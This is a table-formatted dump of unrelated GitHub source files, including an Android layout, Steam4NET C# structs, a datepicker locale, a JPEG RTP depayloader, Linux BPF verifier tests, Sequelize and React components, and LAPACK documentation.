| text (string, lengths 2–100k) | meta (dict) |
| --- | --- |
<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:background="@color/layout_bg_color"
android:fitsSystemWindows="true"
android:orientation="vertical">
<include layout="@layout/layout_toolbar" />
<EditText
android:id="@+id/old_password_et"
android:layout_width="match_parent"
android:layout_height="44dp"
android:layout_marginTop="10dp"
android:background="@color/edit_text_bg_color"
android:hint="旧密码"
android:inputType="textPassword"
android:paddingStart="10dp"
android:paddingEnd="10dp"
android:singleLine="true"
android:textColor="@color/edit_text_text_color"
android:textColorHint="@color/edit_text_hint_color"
android:textSize="16sp" />
<EditText
android:id="@+id/new_password_et"
android:layout_width="match_parent"
android:layout_height="44dp"
android:layout_marginTop="1dp"
android:background="@color/edit_text_bg_color"
android:hint="新密码"
android:inputType="textPassword"
android:paddingStart="10dp"
android:paddingEnd="10dp"
android:singleLine="true"
android:textColor="@color/edit_text_text_color"
android:textColorHint="@color/edit_text_hint_color"
android:textSize="16sp" />
<Button
android:id="@+id/reset_bt"
android:layout_width="match_parent"
android:layout_height="40dp"
android:layout_marginStart="20dp"
android:layout_marginTop="20dp"
android:layout_marginEnd="20dp"
android:background="@drawable/btn_corner_blue"
android:text="修改"
android:textColor="@color/theme_button_text_color"
android:textSize="16sp" />
</LinearLayout> | {
"pile_set_name": "Github"
} |
// This file is automatically generated.
using System;
using System.Text;
using System.Runtime.InteropServices;
namespace Steam4NET
{
[StructLayout(LayoutKind.Sequential,Pack=8)]
[InteropHelp.CallbackIdentity(2301)]
public struct ScreenshotReady_t
{
public const int k_iCallback = 2301;
public UInt32 m_hLocal;
public EResult m_eResult;
};
[StructLayout(LayoutKind.Sequential,Pack=8)]
[InteropHelp.CallbackIdentity(2302)]
public struct ScreenshotRequested_t
{
public const int k_iCallback = 2302;
};
[StructLayout(LayoutKind.Sequential,Pack=8)]
[InteropHelp.CallbackIdentity(2201)]
public struct ScreenshotUploadProgress_t
{
public const int k_iCallback = 2201;
public double m_dPercentScreenshot;
public double m_dPercentBatch;
public Int32 m_nFailed;
};
[StructLayout(LayoutKind.Sequential,Pack=8)]
[InteropHelp.CallbackIdentity(2202)]
public struct ScreenshotWritten_t
{
public const int k_iCallback = 2202;
public UInt32 m_hLocal;
public GameID_t m_gameID;
public UInt32 m_timeCreated;
public UInt32 m_nWidth;
public UInt32 m_nHeight;
};
[StructLayout(LayoutKind.Sequential,Pack=8)]
[InteropHelp.CallbackIdentity(2203)]
public struct ScreenshotUploaded_t
{
public const int k_iCallback = 2203;
public UInt32 m_hLocal;
public GameID_t m_gameID;
public UInt64 m_hFile;
public UInt32 m_timeCreated;
public UInt32 m_nWidth;
public UInt32 m_nHeight;
public EUCMFilePrivacyState m_ePrivacy;
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 540)]
public string m_pchCaption;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 28)]
public Byte[] pubUnknownData;
};
[StructLayout(LayoutKind.Sequential,Pack=8)]
[InteropHelp.CallbackIdentity(2204)]
public struct ScreenshotBatchComplete_t
{
public const int k_iCallback = 2204;
public Int32 m_nAttempted;
public Int32 m_nResultsOK;
};
[StructLayout(LayoutKind.Sequential,Pack=8)]
[InteropHelp.CallbackIdentity(2205)]
public struct ScreenshotDeleted_t
{
public const int k_iCallback = 2205;
public EResult m_eResult;
public UInt32 m_hLocal;
public GameID_t m_gameID;
};
[StructLayout(LayoutKind.Sequential,Pack=8)]
[InteropHelp.CallbackIdentity(2206)]
public struct ScreenshotTriggered_t
{
public const int k_iCallback = 2206;
public GameID_t m_gameID;
};
}
| {
"pile_set_name": "Github"
} |
sbt.version=1.1.0
| {
"pile_set_name": "Github"
} |
/**
* Brazilian translation for bootstrap-datepicker
* Cauan Cabral <[email protected]>
*/
;(function($){
$.fn.datepicker.dates['pt-BR'] = {
days: ["Domingo", "Segunda", "Terça", "Quarta", "Quinta", "Sexta", "Sábado", "Domingo"],
daysShort: ["Dom", "Seg", "Ter", "Qua", "Qui", "Sex", "Sáb", "Dom"],
daysMin: ["Do", "Se", "Te", "Qu", "Qu", "Se", "Sa", "Do"],
months: ["Janeiro", "Fevereiro", "Março", "Abril", "Maio", "Junho", "Julho", "Agosto", "Setembro", "Outubro", "Novembro", "Dezembro"],
monthsShort: ["Jan", "Fev", "Mar", "Abr", "Mai", "Jun", "Jul", "Ago", "Set", "Out", "Nov", "Dez"],
today: "Hoje"
};
}(jQuery));
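For reference, a minimal sketch of how a locale file like the one above is typically consumed, assuming the standard bootstrap-datepicker `language` option; the element id is only illustrative, and the locale script must be loaded after the plugin itself:
// Usage sketch (assumptions: bootstrap-datepicker is already loaded;
// the selector below is hypothetical).
$(function () {
$('#publish-date').datepicker({
language: 'pt-BR', // looks up $.fn.datepicker.dates['pt-BR'] defined above
format: 'dd/mm/yyyy'
});
});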
| {
"pile_set_name": "Github"
} |
import { Tube } from '../component'
import { MessageType, Message } from '../message'
import { VideoMedia } from '../../utils/protocols/sdp'
import { jpegDepayFactory } from './parser'
import { Transform } from 'stream'
import { payloadType, timestamp, marker } from '../../utils/protocols/rtp'
export class JPEGDepay extends Tube {
constructor() {
let jpegPayloadType: number
let packets: Buffer[] = []
let jpegDepay: (
packets: Buffer[],
) => { size: { width: number; height: number }; data: Buffer }
const incoming = new Transform({
objectMode: true,
transform: function (msg: Message, encoding, callback) {
if (msg.type === MessageType.SDP) {
const jpegMedia = msg.sdp.media.find((media): media is VideoMedia => {
return (
media.type === 'video' &&
media.rtpmap !== undefined &&
media.rtpmap.encodingName === 'JPEG'
)
})
if (jpegMedia !== undefined && jpegMedia.rtpmap !== undefined) {
jpegPayloadType = Number(jpegMedia.rtpmap.payloadType)
const framesize = jpegMedia.framesize
// `framesize` is an SDP field that is present in e.g. Axis cameras
// and is used because the width and height that can be sent inside
// the JPEG header are both limited to 2040.
// If present, we use this width and height as the default values
// to be used by the jpeg depay function, otherwise we ignore this
// and let the JPEG header inside the RTP packets determine this.
if (framesize !== undefined) {
const [width, height] = framesize
// msg.framesize = { width, height }
jpegDepay = jpegDepayFactory(width, height)
} else {
jpegDepay = jpegDepayFactory()
}
}
callback(undefined, msg)
} else if (
msg.type === MessageType.RTP &&
payloadType(msg.data) === jpegPayloadType
) {
packets.push(msg.data)
// JPEG over RTP uses the RTP marker bit to indicate end
// of fragmentation. At this point, the packets can be used
// to reconstruct a JPEG frame.
if (marker(msg.data) && packets.length > 0) {
const jpegFrame = jpegDepay(packets)
this.push({
timestamp: timestamp(msg.data),
ntpTimestamp: msg.ntpTimestamp,
payloadType: payloadType(msg.data),
data: jpegFrame.data,
framesize: jpegFrame.size,
type: MessageType.JPEG,
})
packets = []
}
callback()
} else {
// Not a message we should handle
callback(undefined, msg)
}
},
})
// outgoing will be defaulted to a PassThrough stream
super(incoming)
}
}
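The transform above relies on the RTP marker bit to delimit JPEG frames. As a stand-alone illustration of that reassembly step, stripped of this library's Message and Tube types (which are simplified away here), the same grouping logic can be written as:
// Collect RTP payloads until a packet with the marker bit set, then emit the
// concatenated frame — a simplified stand-in for the depayloader above.
// Each element of `packets` is assumed to be { marker: boolean, payload: Buffer }.
function framesFromRtp(packets) {
const frames = []
let current = []
for (const p of packets) {
current.push(p.payload)
if (p.marker) {
frames.push(Buffer.concat(current))
current = []
}
}
return frames
}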
| {
"pile_set_name": "Github"
} |
'Based on GeoNames.org and OpenStreetMap.org data': 'Basierend auf Daten von Geonames.org und OpenStreetMap.org'
'selected marker icon': 'ausgewähltes Markierungssymbol'
'add location to map': 'Ort der Karte hinzufügen'
'Video source': Videoquelle
'The point will be removed from all translations of the article.': 'Der Standort wird aus allen Übersetzungen des Artikels entfernt. '
'Specify country (optional)': 'Land festlegen (optional)'
'Sorry, that place was not found. Check your spelling or search again.': 'Der Ort wurde nicht gefunden. Überprüfen Sie die Schreibweise oder suchen Sie erneut. '
'Show search results': 'Suchergebnisse anzeigen'
'Search for place or coordinate': 'Nach Ort oder Koordinaten suchen'
'Return to edit': 'Zur Bearbeitung zurückkehren'
'Really delete this point?': 'Diesen Standort wirklich löschen?'
'Name and describe this location': 'Benennen und beschreiben Sie diesen Ort'
'Map size': Kartengröße
'Location label': Ortsbezeichnung
'Location description:': 'Ortsbeschreibung: '
'Label url': 'Bezeichnung url'
'Hide search results': 'Suchergebnisse verbergen'
Geo-filtering: Geofilter
'Fill in youtube ID or link, e.g.': 'Bitte Youtube-ID oder Link eingeben, z.B. '
'Fill in vimeo ID or link, e.g': 'Bitte Vimeo-ID oder Link eingeben, z.B. '
'Fill in video ID, link or file name, for YouTube, Vimeo, or flash video.': 'Bitte Video-ID, Link oder Dateinamen für YouTube, Vimeo oder Flash-Video eingeben. '
'Fill in location label': 'Bitte Ortsbezeichnung eingeben'
'Fill in local swf flash file name or link, e.g.': 'Bitte geben Sie den Namen der lokalen Flash-Datei oder den Link ein, z.B. '
'Fill in local flv flash file name or link, e.g.': 'Bitte geben Sie den Namen oder den Link zur lokalen Flash-Datei ein, z.B. '
'Fill in image link, like': 'Bitte Bildlink eingeben, wie '
'Describe the location...': 'Beschreiben Sie den Ort...'
'Delete location': 'Ort löschen'
Coordinates: Koordinaten
'Change video display size': 'Anzeigegröße des Videos ändern'
'Change image display size': 'Anzeigegröße des Bildes ändern'
'Change icon of this location': 'Symbol zum Ort ändern'
'Center map on location': 'Karte zum Ort zentrieren'
'Advanced editing': 'Erweiterte Bearbeitung'
'Add an image to this location': 'Diesem Ort ein Bild hinzufügen'
'Add a video to this location': 'Diesem Ort ein Video hinzufügen'
'Are you sure you want to quit without saving your changes?': 'Wirklich verlassen ohne Änderungen zu speichern?'
'Map preview': 'Vorschau Karte'
'Locations updated.': 'Standorte aktualisiert.'
'Setting the map name helps with map search': 'Einen Kartennamen festlegen um die Kartensuche zu vereinfachen.'
Longitude: Längengrad
Latitude: Breitengrad
Center: Zentrieren
'Last Saved Map View': 'Zuletzt gespeicherte Kartenansicht'
'List of locations updated': 'Liste der Standorte aktualisiert'
width: Breite
'show initial map view': 'Erste Kartenansicht anzeigen'
'problem at point processing, please send error report': 'Problem beim Bearbeiten der Standpunkte, bitte Fehlermeldung senden.'
'plain text': 'Einfacher Text '
'html content': 'HTML Inhalt'
height: Höhe
'fill in map name': 'Kartenname eintragen'
'You do not have the right to remove maps from articles.': 'Keine Berechtigung um Karten aus Artikeln zu entfernen'
'Video file': Videodatei
'Video ID': 'Video ID'
'The map has been removed from the article.': 'Die Karte wurde aus dem Artikel entfernt.'
'Point no.': Standpunktnummer
'Point markers': Standpunktmarkierungen
None: Keine
'Map Search Example': 'Kartensuche Beispiel'
'Map Preview': Kartenvorschau
'Image URL': 'Bild URL'
video: 'Video '
text: Text
image: Bild
icon: Symbol
'Setting Map Locations': 'Kartenstandorte festlegen'
Deselect: 'Auswahl zurücknehmen'
| {
"pile_set_name": "Github"
} |
/**
* @author Martin Micunda {@link http://martinmicunda.com}
* @copyright Copyright (c) 2015, Martin Micunda
* @license GPL-3.0
*/
'use strict';
import {RouteConfig} from '../../../../../ng-decorators'; // jshint unused: false
//start-non-standard
@RouteConfig('app.employees.add.contact-details', {
url: '/contact-details',
views: {
'modal@': {
template: '<employee-contact-details></employee-contact-details>'
}
}
})
//end-non-standard
class EmployeeAddContactDetails {}
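For readers unfamiliar with the decorator, the configuration above is assumed to translate into an ordinary Angular UI-Router state registration along these lines (a sketch of the intent, not the decorator's actual implementation; the module name is hypothetical):
// Hypothetical equivalent without @RouteConfig; the real wiring lives in ng-decorators.
angular.module('app').config(function ($stateProvider) {
$stateProvider.state('app.employees.add.contact-details', {
url: '/contact-details',
views: {
'modal@': {
template: '<employee-contact-details></employee-contact-details>'
}
}
});
});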
| {
"pile_set_name": "Github"
} |
/*
* Backpack - Skyscanner's Design System
*
* Copyright 2016-2020 Skyscanner Ltd
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/* @flow strict */
import PropTypes from 'prop-types';
import React, { type Node } from 'react';
import { cssModules } from 'bpk-react-utils';
import STYLES from './BpkTable.scss';
const getClassName = cssModules(STYLES);
type Props = {
children: Node,
className: ?string,
};
const BpkTableCell = (props: Props) => {
const { className, ...rest } = props;
const classNames = getClassName('bpk-table__cell', className);
return (
// $FlowFixMe[cannot-spread-inexact] - inexact rest. See decisions/flowfixme.md
<td className={classNames} {...rest}>
{props.children}
</td>
);
};
BpkTableCell.propTypes = {
className: PropTypes.string,
children: PropTypes.node.isRequired,
};
BpkTableCell.defaultProps = {
className: null,
};
export default BpkTableCell;
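Because the cell merges `className` and spreads every remaining prop onto the underlying `<td>`, a typical call site looks like the sketch below (the row component and class name are illustrative stand-ins for whatever table wrapper is in use):
// Usage sketch — extra props such as colSpan pass straight through to the <td>.
const ExampleRow = () => (
<BpkTableRow>
<BpkTableCell className="my-custom-cell" colSpan={2}>
Edinburgh
</BpkTableCell>
</BpkTableRow>
);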
| {
"pile_set_name": "Github"
} |
{
"ld_abs: check calling conv, r1",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_MOV64_IMM(BPF_REG_1, 0),
BPF_LD_ABS(BPF_W, -0x200000),
BPF_MOV64_REG(BPF_REG_0, BPF_REG_1),
BPF_EXIT_INSN(),
},
.errstr = "R1 !read_ok",
.result = REJECT,
},
{
"ld_abs: check calling conv, r2",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_MOV64_IMM(BPF_REG_2, 0),
BPF_LD_ABS(BPF_W, -0x200000),
BPF_MOV64_REG(BPF_REG_0, BPF_REG_2),
BPF_EXIT_INSN(),
},
.errstr = "R2 !read_ok",
.result = REJECT,
},
{
"ld_abs: check calling conv, r3",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_MOV64_IMM(BPF_REG_3, 0),
BPF_LD_ABS(BPF_W, -0x200000),
BPF_MOV64_REG(BPF_REG_0, BPF_REG_3),
BPF_EXIT_INSN(),
},
.errstr = "R3 !read_ok",
.result = REJECT,
},
{
"ld_abs: check calling conv, r4",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_MOV64_IMM(BPF_REG_4, 0),
BPF_LD_ABS(BPF_W, -0x200000),
BPF_MOV64_REG(BPF_REG_0, BPF_REG_4),
BPF_EXIT_INSN(),
},
.errstr = "R4 !read_ok",
.result = REJECT,
},
{
"ld_abs: check calling conv, r5",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_MOV64_IMM(BPF_REG_5, 0),
BPF_LD_ABS(BPF_W, -0x200000),
BPF_MOV64_REG(BPF_REG_0, BPF_REG_5),
BPF_EXIT_INSN(),
},
.errstr = "R5 !read_ok",
.result = REJECT,
},
{
"ld_abs: check calling conv, r7",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_MOV64_IMM(BPF_REG_7, 0),
BPF_LD_ABS(BPF_W, -0x200000),
BPF_MOV64_REG(BPF_REG_0, BPF_REG_7),
BPF_EXIT_INSN(),
},
.result = ACCEPT,
},
{
"ld_abs: tests on r6 and skb data reload helper",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_LD_ABS(BPF_B, 0),
BPF_LD_ABS(BPF_H, 0),
BPF_LD_ABS(BPF_W, 0),
BPF_MOV64_REG(BPF_REG_7, BPF_REG_6),
BPF_MOV64_IMM(BPF_REG_6, 0),
BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),
BPF_MOV64_IMM(BPF_REG_2, 1),
BPF_MOV64_IMM(BPF_REG_3, 2),
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_skb_vlan_push),
BPF_MOV64_REG(BPF_REG_6, BPF_REG_7),
BPF_LD_ABS(BPF_B, 0),
BPF_LD_ABS(BPF_H, 0),
BPF_LD_ABS(BPF_W, 0),
BPF_MOV64_IMM(BPF_REG_0, 42),
BPF_EXIT_INSN(),
},
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = ACCEPT,
.retval = 42 /* ultimate return value */,
},
{
"ld_abs: invalid op 1",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_LD_ABS(BPF_DW, 0),
BPF_EXIT_INSN(),
},
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = REJECT,
.errstr = "unknown opcode",
},
{
"ld_abs: invalid op 2",
.insns = {
BPF_MOV32_IMM(BPF_REG_0, 256),
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_LD_IND(BPF_DW, BPF_REG_0, 0),
BPF_EXIT_INSN(),
},
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = REJECT,
.errstr = "unknown opcode",
},
{
"ld_abs: nmap reduced",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_LD_ABS(BPF_H, 12),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0x806, 28),
BPF_LD_ABS(BPF_H, 12),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0x806, 26),
BPF_MOV32_IMM(BPF_REG_0, 18),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -64),
BPF_LDX_MEM(BPF_W, BPF_REG_7, BPF_REG_10, -64),
BPF_LD_IND(BPF_W, BPF_REG_7, 14),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -60),
BPF_MOV32_IMM(BPF_REG_0, 280971478),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -56),
BPF_LDX_MEM(BPF_W, BPF_REG_7, BPF_REG_10, -56),
BPF_LDX_MEM(BPF_W, BPF_REG_0, BPF_REG_10, -60),
BPF_ALU32_REG(BPF_SUB, BPF_REG_0, BPF_REG_7),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 15),
BPF_LD_ABS(BPF_H, 12),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0x806, 13),
BPF_MOV32_IMM(BPF_REG_0, 22),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -56),
BPF_LDX_MEM(BPF_W, BPF_REG_7, BPF_REG_10, -56),
BPF_LD_IND(BPF_H, BPF_REG_7, 14),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -52),
BPF_MOV32_IMM(BPF_REG_0, 17366),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -48),
BPF_LDX_MEM(BPF_W, BPF_REG_7, BPF_REG_10, -48),
BPF_LDX_MEM(BPF_W, BPF_REG_0, BPF_REG_10, -52),
BPF_ALU32_REG(BPF_SUB, BPF_REG_0, BPF_REG_7),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
BPF_MOV32_IMM(BPF_REG_0, 256),
BPF_EXIT_INSN(),
BPF_MOV32_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN(),
},
.data = {
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0x08, 0x06, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0x10, 0xbf, 0x48, 0xd6, 0x43, 0xd6,
},
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = ACCEPT,
.retval = 256,
},
{
"ld_abs: div + abs, test 1",
.insns = {
BPF_ALU64_REG(BPF_MOV, BPF_REG_6, BPF_REG_1),
BPF_LD_ABS(BPF_B, 3),
BPF_ALU64_IMM(BPF_MOV, BPF_REG_2, 2),
BPF_ALU32_REG(BPF_DIV, BPF_REG_0, BPF_REG_2),
BPF_ALU64_REG(BPF_MOV, BPF_REG_8, BPF_REG_0),
BPF_LD_ABS(BPF_B, 4),
BPF_ALU64_REG(BPF_ADD, BPF_REG_8, BPF_REG_0),
BPF_LD_IND(BPF_B, BPF_REG_8, -70),
BPF_EXIT_INSN(),
},
.data = {
10, 20, 30, 40, 50,
},
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = ACCEPT,
.retval = 10,
},
{
"ld_abs: div + abs, test 2",
.insns = {
BPF_ALU64_REG(BPF_MOV, BPF_REG_6, BPF_REG_1),
BPF_LD_ABS(BPF_B, 3),
BPF_ALU64_IMM(BPF_MOV, BPF_REG_2, 2),
BPF_ALU32_REG(BPF_DIV, BPF_REG_0, BPF_REG_2),
BPF_ALU64_REG(BPF_MOV, BPF_REG_8, BPF_REG_0),
BPF_LD_ABS(BPF_B, 128),
BPF_ALU64_REG(BPF_ADD, BPF_REG_8, BPF_REG_0),
BPF_LD_IND(BPF_B, BPF_REG_8, -70),
BPF_EXIT_INSN(),
},
.data = {
10, 20, 30, 40, 50,
},
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = ACCEPT,
.retval = 0,
},
{
"ld_abs: div + abs, test 3",
.insns = {
BPF_ALU64_REG(BPF_MOV, BPF_REG_6, BPF_REG_1),
BPF_ALU64_IMM(BPF_MOV, BPF_REG_7, 0),
BPF_LD_ABS(BPF_B, 3),
BPF_ALU32_REG(BPF_DIV, BPF_REG_0, BPF_REG_7),
BPF_EXIT_INSN(),
},
.data = {
10, 20, 30, 40, 50,
},
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = ACCEPT,
.retval = 0,
},
{
"ld_abs: div + abs, test 4",
.insns = {
BPF_ALU64_REG(BPF_MOV, BPF_REG_6, BPF_REG_1),
BPF_ALU64_IMM(BPF_MOV, BPF_REG_7, 0),
BPF_LD_ABS(BPF_B, 256),
BPF_ALU32_REG(BPF_DIV, BPF_REG_0, BPF_REG_7),
BPF_EXIT_INSN(),
},
.data = {
10, 20, 30, 40, 50,
},
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = ACCEPT,
.retval = 0,
},
{
"ld_abs: vlan + abs, test 1",
.insns = { },
.data = {
0x34,
},
.fill_helper = bpf_fill_ld_abs_vlan_push_pop,
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = ACCEPT,
.retval = 0xbef,
},
{
"ld_abs: vlan + abs, test 2",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_LD_ABS(BPF_B, 0),
BPF_LD_ABS(BPF_H, 0),
BPF_LD_ABS(BPF_W, 0),
BPF_MOV64_REG(BPF_REG_7, BPF_REG_6),
BPF_MOV64_IMM(BPF_REG_6, 0),
BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),
BPF_MOV64_IMM(BPF_REG_2, 1),
BPF_MOV64_IMM(BPF_REG_3, 2),
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0,
BPF_FUNC_skb_vlan_push),
BPF_MOV64_REG(BPF_REG_6, BPF_REG_7),
BPF_LD_ABS(BPF_B, 0),
BPF_LD_ABS(BPF_H, 0),
BPF_LD_ABS(BPF_W, 0),
BPF_MOV64_IMM(BPF_REG_0, 42),
BPF_EXIT_INSN(),
},
.data = {
0x34,
},
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = ACCEPT,
.retval = 42,
},
{
"ld_abs: jump around ld_abs",
.insns = { },
.data = {
10, 11,
},
.fill_helper = bpf_fill_jump_around_ld_abs,
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = ACCEPT,
.retval = 10,
},
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="JavaScriptLibraryMappings">
<includedPredefinedLibrary name="ECMAScript 6" />
</component>
</project> | {
"pile_set_name": "Github"
} |
import {onetomany, manytoone, manytomany} from '../core/decorators';
import {column, entity} from '../sequelizeimp/decorators';
import {Strict} from '../sequelizeimp/enums';
import * as Sequelize from "sequelize";
import {BlogSqlModel} from "./blogSqlModel"
@entity({ name:'tbl_blog_post2', tableName: 'tbl_blog_post2',timestamps:false })
export class BlogPostSqlModel {
@column({name:"id", type: Sequelize.INTEGER, autoIncrement:true, allowNull:false, primaryKey: true })
_id: number;
@column({ name: "name", type: Sequelize.STRING(128), defaultValue:"defaultBlog" })
name: string;
@manytoone({ rel: 'tbl_blog2', itemType: BlogSqlModel, embedded: false, persist: true, eagerLoading: true })
blog: BlogSqlModel;
}
export default BlogPostSqlModel; | {
"pile_set_name": "Github"
} |
*> \brief \b ZLA_GBAMV performs a matrix-vector operation to calculate error bounds.
*
* =========== DOCUMENTATION ===========
*
* Online html documentation available at
* http://www.netlib.org/lapack/explore-html/
*
*> \htmlonly
*> Download ZLA_GBAMV + dependencies
*> <a href="http://www.netlib.org/cgi-bin/netlibfiles.tgz?format=tgz&filename=/lapack/lapack_routine/zla_gbamv.f">
*> [TGZ]</a>
*> <a href="http://www.netlib.org/cgi-bin/netlibfiles.zip?format=zip&filename=/lapack/lapack_routine/zla_gbamv.f">
*> [ZIP]</a>
*> <a href="http://www.netlib.org/cgi-bin/netlibfiles.txt?format=txt&filename=/lapack/lapack_routine/zla_gbamv.f">
*> [TXT]</a>
*> \endhtmlonly
*
* Definition:
* ===========
*
* SUBROUTINE ZLA_GBAMV( TRANS, M, N, KL, KU, ALPHA, AB, LDAB, X,
* INCX, BETA, Y, INCY )
*
* .. Scalar Arguments ..
* DOUBLE PRECISION ALPHA, BETA
* INTEGER INCX, INCY, LDAB, M, N, KL, KU, TRANS
* ..
* .. Array Arguments ..
* COMPLEX*16 AB( LDAB, * ), X( * )
* DOUBLE PRECISION Y( * )
* ..
*
*
*> \par Purpose:
* =============
*>
*> \verbatim
*>
*> ZLA_GBAMV performs one of the matrix-vector operations
*>
*> y := alpha*abs(A)*abs(x) + beta*abs(y),
*> or y := alpha*abs(A)**T*abs(x) + beta*abs(y),
*>
*> where alpha and beta are scalars, x and y are vectors and A is an
*> m by n matrix.
*>
*> This function is primarily used in calculating error bounds.
*> To protect against underflow during evaluation, components in
*> the resulting vector are perturbed away from zero by (N+1)
*> times the underflow threshold. To prevent unnecessarily large
*> errors for block-structure embedded in general matrices,
*> "symbolically" zero components are not perturbed. A zero
*> entry is considered "symbolic" if all multiplications involved
*> in computing that entry have at least one zero multiplicand.
*> \endverbatim
*
* Arguments:
* ==========
*
*> \param[in] TRANS
*> \verbatim
*> TRANS is INTEGER
*> On entry, TRANS specifies the operation to be performed as
*> follows:
*>
*> BLAS_NO_TRANS y := alpha*abs(A)*abs(x) + beta*abs(y)
*> BLAS_TRANS y := alpha*abs(A**T)*abs(x) + beta*abs(y)
*> BLAS_CONJ_TRANS y := alpha*abs(A**T)*abs(x) + beta*abs(y)
*>
*> Unchanged on exit.
*> \endverbatim
*>
*> \param[in] M
*> \verbatim
*> M is INTEGER
*> On entry, M specifies the number of rows of the matrix A.
*> M must be at least zero.
*> Unchanged on exit.
*> \endverbatim
*>
*> \param[in] N
*> \verbatim
*> N is INTEGER
*> On entry, N specifies the number of columns of the matrix A.
*> N must be at least zero.
*> Unchanged on exit.
*> \endverbatim
*>
*> \param[in] KL
*> \verbatim
*> KL is INTEGER
*> The number of subdiagonals within the band of A. KL >= 0.
*> \endverbatim
*>
*> \param[in] KU
*> \verbatim
*> KU is INTEGER
*> The number of superdiagonals within the band of A. KU >= 0.
*> \endverbatim
*>
*> \param[in] ALPHA
*> \verbatim
*> ALPHA is DOUBLE PRECISION
*> On entry, ALPHA specifies the scalar alpha.
*> Unchanged on exit.
*> \endverbatim
*>
*> \param[in] AB
*> \verbatim
*> AB is COMPLEX*16 array, dimension ( LDAB, n )
*> Before entry, the leading m by n part of the array AB must
*> contain the matrix of coefficients.
*> Unchanged on exit.
*> \endverbatim
*>
*> \param[in] LDAB
*> \verbatim
*> LDAB is INTEGER
*> On entry, LDAB specifies the first dimension of AB as declared
*> in the calling (sub) program. LDAB must be at least
*> max( 1, m ).
*> Unchanged on exit.
*> \endverbatim
*>
*> \param[in] X
*> \verbatim
*> X is COMPLEX*16 array, dimension
*> ( 1 + ( n - 1 )*abs( INCX ) ) when TRANS = 'N' or 'n'
*> and at least
*> ( 1 + ( m - 1 )*abs( INCX ) ) otherwise.
*> Before entry, the incremented array X must contain the
*> vector x.
*> Unchanged on exit.
*> \endverbatim
*>
*> \param[in] INCX
*> \verbatim
*> INCX is INTEGER
*> On entry, INCX specifies the increment for the elements of
*> X. INCX must not be zero.
*> Unchanged on exit.
*> \endverbatim
*>
*> \param[in] BETA
*> \verbatim
*> BETA is DOUBLE PRECISION
*> On entry, BETA specifies the scalar beta. When BETA is
*> supplied as zero then Y need not be set on input.
*> Unchanged on exit.
*> \endverbatim
*>
*> \param[in,out] Y
*> \verbatim
*> Y is DOUBLE PRECISION array, dimension
*> ( 1 + ( m - 1 )*abs( INCY ) ) when TRANS = 'N' or 'n'
*> and at least
*> ( 1 + ( n - 1 )*abs( INCY ) ) otherwise.
*> Before entry with BETA non-zero, the incremented array Y
*> must contain the vector y. On exit, Y is overwritten by the
*> updated vector y.
*> \endverbatim
*>
*> \param[in] INCY
*> \verbatim
*> INCY is INTEGER
*> On entry, INCY specifies the increment for the elements of
*> Y. INCY must not be zero.
*> Unchanged on exit.
*>
*> Level 2 Blas routine.
*> \endverbatim
*
* Authors:
* ========
*
*> \author Univ. of Tennessee
*> \author Univ. of California Berkeley
*> \author Univ. of Colorado Denver
*> \author NAG Ltd.
*
*> \date June 2017
*
*> \ingroup complex16GBcomputational
*
* =====================================================================
